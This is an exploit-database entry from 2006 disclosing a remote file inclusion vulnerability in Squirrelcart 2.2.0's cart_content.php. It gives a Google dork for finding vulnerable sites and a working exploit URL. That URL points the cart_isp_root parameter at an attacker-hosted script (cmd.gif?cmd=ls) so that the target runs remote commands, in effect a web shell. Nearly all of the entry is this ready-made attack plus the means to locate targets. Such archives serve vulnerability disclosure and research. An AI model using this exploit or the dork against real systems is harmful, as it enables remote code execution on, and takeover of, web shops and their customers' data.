Squirrelcart 2.2.0 - 'cart_content.php' Remote File Inclusion

EDB-ID:

1790


Author:

OLiBekaS

Type:

webapps


Platform:

PHP

Date:

2006-05-15


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

Title         : Squirrelcart <= 2.2.0 Remote File Inclusion
URL           : http://www.ldev.com/
google Dork   : inurl:/squirrelcart/
Author        : OLiBekaS
greetz        : Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew

Exploit       : /cart_content.php?cart_isp_root=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-05-15]